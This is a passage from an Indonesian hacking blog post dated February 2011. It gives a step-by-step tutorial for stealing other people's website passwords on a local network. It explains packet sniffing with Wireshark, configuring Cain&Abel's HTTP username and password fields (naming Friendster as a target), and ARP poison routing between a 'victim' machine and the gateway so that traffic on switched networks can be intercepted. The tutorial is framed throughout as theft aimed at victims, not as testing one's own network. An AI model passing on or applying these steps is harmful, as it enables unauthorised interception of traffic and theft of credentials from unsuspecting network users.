* Untuk menganalisis datanya klik kanan pada data yang ingin di analisis lalu klik “Follow TCP Stream” dan selamat menganalisis paketnya (saya tidak akan menjelaskan caranya karena saya tidak bisa )
* Yang jelas dari data itu pasti di dalamnya terdapat informasi2 yang dimasukkan korban ke website dan sebaliknya

Cara di atas hanya berlaku apabila jaringan anda adalah Hub bukan switch
Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.

Cara Menggunakan Cain&Abel:

* Penggunaan program ini jauh lebih mudah dan simple daripada menggunakan wireshark, tetapi bila anda menginginkan semua packet yang sudah keluar dan masuk disarankan anda menggunakan program wireshark
* Buka program Cain anda
* Klik pada bagian configure
* Pada bagian “Sniffer” pilih ethernet card yang akan anda gunakan
* Pada bagian “HTTP Fields” anda harus menambahkan username fields dan password fields nya apabila yang anda inginkan tidak ada di daftar.
Sebagai contoh saya akan beritahukan bahwa kalo anda mau hack password Friendster anda harus menambahkan di username fields dan passworsd fields kata name, untuk yang lain anda bisa mencarinya dengan menekan klik kanan view source dan anda harus mencari variabel input dari login dan password website tersebut. Yang sudah ada di defaultnya rasanyan sudah cukup lengkap, anda dapat mencuri pass yang ada di klubmentari tanpa menambah apapun.
* Setelah itu apply settingannya dan klik ok
* Di menu utama terdapat 8 tab, dan yang akan dibahas hanya 1 tab yaitu tab “Sniffer” karena itu pilih lah tab tersebut dan jangan pindah2 dari tab tersebut untuk mencegah kebingungan anda sendiri
* Aktifkan Sniffer dengan cara klik tombol sniffer yang ada di atas tab2 tersebut, carilah tombol yang tulisannya “Start/Stop Sniffer”
* Bila anda ada di jaringan hub saat ini anda sudah bisa mengetahui password yang masuk dengan cara klik tab (Kali ini tab yang ada di bawah bukan yang di tengah, yang ditengah sudah tidak usah diklik-klik lagi) “Passwords”
* Anda tinggal memilih password dari koneksi mana yang ingin anda lihat akan sudah terdaftar di sana
* Bila anda ternyata ada di jaringan switch, ini membutuhkan perjuangan lebih, anda harus mengaktifkan APR yang tombolonya ada di sebelah kanan Sniffer (Dan ini tidak dijamin berhasil karena manage dari switch jauh lebih lengkap&secure dari hub)
* Sebelum diaktifkan pada tab sniffer yang bagian bawah pilih APR
* Akan terlihat 2 buah list yang masih kosong, klik list kosong bagian atas kemudian klik tombol “+” (Bentuknya seperti itu) yang ada di jajaran tombol sniffer APR dll
* Akan ada 2 buah field yang berisi semua host yang ada di jaringan anda
* Hubungkan antara alamat ip korban dan alamat ip gateway server (untuk mengetahui alamat gateway server klik start pada komp anda pilih run ketik cmd lalu ketik ipconfig pada command prompt)
* Setelah itu baru aktifkan APR, dan semua data dari komp korban ke server dapat anda lihat dengan cara yang sama.

Anda dapat menjalankan kedua program di atas secara bersamaan (Cain untuk APR dan wireshark untuk packet sniffing) bila ingin hasil yang lebih maksimal.

Password yang bisa anda curi adalah password yang ada di server HTTP (server yang tidak terenkripsi), bila data tersebut ada di server yang terenkripsi maka anda harus mendekripsi data tersebut sebelum memperoleh passwordnya (dan itu akan membutuhkan langkah2 yang jauh lebih panjang dari cara hack ini).

 
Tinggalkan komentar

Ditulis oleh pada 5 Februari 2011 in hacking